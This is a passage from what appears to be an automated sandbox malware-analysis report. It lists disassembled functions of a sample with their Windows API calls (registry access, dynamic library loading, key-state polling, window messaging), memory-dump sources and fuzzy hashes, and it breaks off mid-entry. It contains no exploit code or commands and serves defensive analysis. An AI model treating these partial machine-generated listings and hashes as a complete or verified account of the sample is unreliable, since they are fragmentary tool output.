                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                          • String ID:
                                                          • API String ID: 1559183368-0
                                                          • Opcode ID: 17c9c7776e299596ed796557eca7f8bd29831e9b0e98da48d3161094909ff33f
                                                          • Instruction ID: 7e6b4515aa7fa0de77d19f116f42919a44128df6cce8051b8aba0565712d0c79
                                                          • Opcode Fuzzy Hash: 17c9c7776e299596ed796557eca7f8bd29831e9b0e98da48d3161094909ff33f
                                                          • Instruction Fuzzy Hash: 1051B230A00B06DBDB268F69C88466EB7B6AF41324F25C73DF8269A2D8D7719D50DB50
                                                          Function 003C00C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                            • Part of subcall function 003C0EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BFE38,?,?), ref: 003C0EBC
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003C0188
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003C01C7
                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003C020E
                                                          • RegCloseKey.ADVAPI32(?,?), ref: 003C023A
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 003C0247
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                          • String ID:
                                                          • API String ID: 3440857362-0
                                                          • Opcode ID: f419a984da221e1e9cb04629c1b6148411160aac0c5636817161a8f72b9e0e13
                                                          • Instruction ID: 81bfaf09d582bc5914353c1b13e500d2061279ad9d417230d65d7a3a6d36cb00
                                                          • Opcode Fuzzy Hash: f419a984da221e1e9cb04629c1b6148411160aac0c5636817161a8f72b9e0e13
                                                          • Instruction Fuzzy Hash: 58514971208244EFD706EBA4C885F6AB7E9FF84714F04892DB5958B2A2DB31ED04DB52
                                                          Function 003BD9DC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00349997: __itow.LIBCMT ref: 003499C2
                                                            • Part of subcall function 00349997: __swprintf.LIBCMT ref: 00349A0C
                                                          • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 003BDA3B
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 003BDABE
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 003BDADA
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 003BDB1B
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 003BDB35
                                                            • Part of subcall function 00345B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003A793F,?,?,00000000), ref: 00345B8C
                                                            • Part of subcall function 00345B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003A793F,?,?,00000000,?,?), ref: 00345BB0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 327935632-0
                                                          • Opcode ID: c4f79414447f48b4304bba11f44993fed3e6f6bb914247a269f52701ebd1952d
                                                          • Instruction ID: 779d667577825d717027c1ef23e3922c3b9b8bbf18cfe5f8a211b03e7ae5ebb4
                                                          • Opcode Fuzzy Hash: c4f79414447f48b4304bba11f44993fed3e6f6bb914247a269f52701ebd1952d
                                                          • Instruction Fuzzy Hash: 58512775A04205DFCB02EFA8C4849AEB7F9EF48314B158069E915AB712DB31AD45CF90
                                                          Function 003AE5FD Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003AE6AB
                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003AE6D4
                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003AE713
                                                            • Part of subcall function 00349997: __itow.LIBCMT ref: 003499C2
                                                            • Part of subcall function 00349997: __swprintf.LIBCMT ref: 00349A0C
                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003AE738
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003AE740
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1389676194-0
                                                          • Opcode ID: 21e982bd15e5631171aa0d92ded78441f49f99bd3aa9608dc8e8876107abe05e
                                                          • Instruction ID: 040d67543abc5bedb685d296147f342c71698d3e85d1b1f1645d6f3524a89bca
                                                          • Opcode Fuzzy Hash: 21e982bd15e5631171aa0d92ded78441f49f99bd3aa9608dc8e8876107abe05e
                                                          • Instruction Fuzzy Hash: 2051FA35A00605DFCB06EF64C981AAEBBF9EF49314B148499E849AF362CB31ED11DF50
                                                          Function 003CA088 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34bfe8077e7e09d03324b800ec33b6793345996852f99a4ff86f2dffd703c747
                                                          • Instruction ID: 8f49aea56ddf8c43fa69eabfb410ffa4e9f61604bca0f6c285d84813a0f6e2cb
                                                          • Opcode Fuzzy Hash: 34bfe8077e7e09d03324b800ec33b6793345996852f99a4ff86f2dffd703c747
                                                          • Instruction Fuzzy Hash: E5411735900A0CAFD712DF68CC45FA9BBA9EB09364F1A416DF916E72E0C730AD40DB51
                                                          Function 00342344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 00342357
                                                          • ScreenToClient.USER32(004057B0,?), ref: 00342374
                                                          • GetAsyncKeyState.USER32(00000001), ref: 00342399
                                                          • GetAsyncKeyState.USER32(00000002), ref: 003423A7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AsyncState$ClientCursorScreen
                                                          • String ID:
                                                          • API String ID: 4210589936-0
                                                          • Opcode ID: 1ef3e6538e652bebe417aadc30427e538362b81b30ed43c7a97bdb7a2938d430
                                                          • Instruction ID: bb88c84577bd4fea19d3f1774375825364a6461c5411bcdb3f1f7825b2589400
                                                          • Opcode Fuzzy Hash: 1ef3e6538e652bebe417aadc30427e538362b81b30ed43c7a97bdb7a2938d430
                                                          • Instruction Fuzzy Hash: 79417135904115FFCF269F68C844EEABBB5FB05360F50836AF829AA291C7386D50DF91
                                                          Function 00396700 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0039673D
                                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 00396789
                                                          • TranslateMessage.USER32(?), ref: 003967B2
                                                          • DispatchMessageW.USER32(?), ref: 003967BC
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003967CB
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                          • String ID:
                                                          • API String ID: 2108273632-0
                                                          • Opcode ID: 6d802e5f3439ef12e35011476c945b10decb368ca678fa8e8adbda87585fe998
                                                          • Instruction ID: b4da74902f8e6482ffc12e8f7db5fdd65cf9b9e32e7676b322233a83712266bf
                                                          • Opcode Fuzzy Hash: 6d802e5f3439ef12e35011476c945b10decb368ca678fa8e8adbda87585fe998
                                                          • Instruction Fuzzy Hash: 7031B031902606AFDF229BB08C4AFB77BECEB01308F150179E422D71A1E735A885DB64
                                                          Function 00398CE1 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 00398CF2
                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00398D9C
                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00398DA4
                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 00398DB2
                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00398DBA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleep$RectWindow
                                                          • String ID:
                                                          • API String ID: 3382505437-0
                                                          • Opcode ID: b3b4c9a8baf76d25d08d469182736da4854758c5db0ecfb3be19ca2de82e8c4e
                                                          • Instruction ID: 95192010818e1b7e8758ba6fa8849119bf7b312ad76f5ab6395e970b6d0308de
                                                          • Opcode Fuzzy Hash: b3b4c9a8baf76d25d08d469182736da4854758c5db0ecfb3be19ca2de82e8c4e
                                                          • Instruction Fuzzy Hash: D531EE71500219EFDF01CF68D94CA9E7BBAEB55315F114229F925EA1D0C7B0AA10CB90
                                                          Function 0039B4AE Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 0039B4C6
                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0039B4E3
                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0039B51B
                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0039B541
                                                          • _wcsstr.LIBCMT ref: 0039B54B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                          • String ID:
                                                          • API String ID: 3902887630-0
                                                          • Opcode ID: c7c7343f6fd1af14923e3a2e2e7369e5e52550c31a8ad174b38561fe13683e3c
                                                          • Instruction ID: 7e737608b1d705a21d169afd5a4ae7564dbff4b91d906ea99c8052fd63ac0bba
                                                          • Opcode Fuzzy Hash: c7c7343f6fd1af14923e3a2e2e7369e5e52550c31a8ad174b38561fe13683e3c
                                                          • Instruction Fuzzy Hash: B221DA32604204BFEF275B39AD49E7BBB9DDF45750F028029F805DE161EB61DC5097A0
                                                          Function 003CB17F Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 003CB1C6
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 003CB1EB
                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 003CB203
                                                          • GetSystemMetrics.USER32(00000004), ref: 003CB22C
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,003B0FA5,00000000), ref: 003CB24A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$MetricsSystem
                                                          • String ID:
                                                          • API String ID: 2294984445-0
                                                          • Opcode ID: f444a4009958933d5d4fea5daf5092e16a2dcc8fc475d643a90494cdebb37781
                                                          • Instruction ID: 4d96adba1aa03de9fa359704adbe319d2dbb20c73823cf617355e8608b52cb0b
                                                          • Opcode Fuzzy Hash: f444a4009958933d5d4fea5daf5092e16a2dcc8fc475d643a90494cdebb37781
                                                          • Instruction Fuzzy Hash: AC219171510215AFCB12AF388C09F6AB7A9EB45321F154B38FD22D71E0E730AC10DB90
                                                          Function 003995C9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003995E2
                                                            • Part of subcall function 00347D2C: _memmove.LIBCMT ref: 00347D66
                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00399614
                                                          • __itow.LIBCMT ref: 0039962C
                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00399654
                                                          • __itow.LIBCMT ref: 00399665
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$__itow$_memmove
                                                          • String ID:
                                                          • API String ID: 2983881199-0
                                                          • Opcode ID: 6dd874b8327d8ba0550a50b13c99844d4e706345db7bec9670b051349be62cc0
                                                          • Instruction ID: b90868cccec079312c1585f08961a14ad06859b1df2bed4bf3900d9a8698d5ab
                                                          • Opcode Fuzzy Hash: 6dd874b8327d8ba0550a50b13c99844d4e706345db7bec9670b051349be62cc0
                                                          • Instruction Fuzzy Hash: 4821C532B00218BBDF12AA698C89FEE7BADDB59720F05402AF904DF251D7709D459791
                                                          Function 003B5B63 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsWindow.USER32(00000000), ref: 003B5B84
                                                          • GetForegroundWindow.USER32 ref: 003B5B9B
                                                          • GetDC.USER32(00000000), ref: 003B5BD7
                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 003B5BE3
                                                          • ReleaseDC.USER32(00000000,00000003), ref: 003B5C1E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$ForegroundPixelRelease
                                                          • String ID:
                                                          • API String ID: 4156661090-0
                                                          • Opcode ID: 275994ec06b081b0826e4ed79e1181ecbcd3f37c93fdf5719d086ad07444c01c
                                                          • Instruction ID: 043e9fb526fea8d1f265945f887606139054537eade09fbd7dfbdb51ce987389
                                                          • Opcode Fuzzy Hash: 275994ec06b081b0826e4ed79e1181ecbcd3f37c93fdf5719d086ad07444c01c
                                                          • Instruction Fuzzy Hash: 39216D75A00604AFD715EF65CC88AAABBE9EF48310F148479F94ADB762CB30BD00CB50
                                                          Function 003412F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0034134D
                                                          • SelectObject.GDI32(?,00000000), ref: 0034135C
                                                          • BeginPath.GDI32(?), ref: 00341373
                                                          • SelectObject.GDI32(?,00000000), ref: 0034139C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ObjectSelect$BeginCreatePath
                                                          • String ID:
                                                          • API String ID: 3225163088-0
                                                          • Opcode ID: 73ec043bc9f28c6c536e9cb132dc29ef803ae547985f5f085fa8c72e9f902a6a
                                                          • Instruction ID: bb090336df2aa213557da5d2fc7d69f5f0f08ae878136ce5b281ba3e30457b5d
                                                          • Opcode Fuzzy Hash: 73ec043bc9f28c6c536e9cb132dc29ef803ae547985f5f085fa8c72e9f902a6a
                                                          • Instruction Fuzzy Hash: 3F218635800A08DFDB12AF25DD08B6A7BE9FB00751F148225FC14AA5B0D371A8A1DF54
                                                          Function 003A4B3A Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 003A4B61
                                                          • __beginthreadex.LIBCMT ref: 003A4B7F
                                                          • MessageBoxW.USER32(?,?,?,?), ref: 003A4B94
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003A4BAA
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003A4BB1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                          • String ID:
                                                          • API String ID: 3824534824-0
                                                          • Opcode ID: 6d7fbebd28235ac07a55cb89f29d9e8e6df584d57035c04f2b46697f8788083f
                                                          • Instruction ID: 959d4b31bd5ef8fd89ec4b20eba355587723fed05d2db460dae20585e55f55d8
                                                          • Opcode Fuzzy Hash: 6d7fbebd28235ac07a55cb89f29d9e8e6df584d57035c04f2b46697f8788083f
                                                          • Instruction Fuzzy Hash: B2110876904654BFD7029BA89C08E9B7FADEB89320F1442A9F814E3251D6B1D9008BB0
                                                          Function 0039852A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00398546
                                                          • GetLastError.KERNEL32(?,0039800A,?,?,?), ref: 00398550
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,0039800A,?,?,?), ref: 0039855F
                                                          • HeapAlloc.KERNEL32(00000000,?,0039800A,?,?,?), ref: 00398566
                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0039857D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 842720411-0
                                                          • Opcode ID: 8ff524e1305342c2e4c756e202f39315497a16cf1657b97760c32a9fe1707dbf
                                                          • Instruction ID: e7099ec4cf94a288cfc80f67627508e3f62c0ac6f5cfdcc3250cce05faa54ba9
                                                          • Opcode Fuzzy Hash: 8ff524e1305342c2e4c756e202f39315497a16cf1657b97760c32a9fe1707dbf
                                                          • Instruction Fuzzy Hash: DA016D71200208FFDB225FA6DC48D6B7FADFF8A355B15052AF809C2220DA329D14DB60
                                                          Function 003A52EB Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A5307
                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 003A5315
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A531D
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 003A5327
                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A5363
                                                          Memory Dump Source
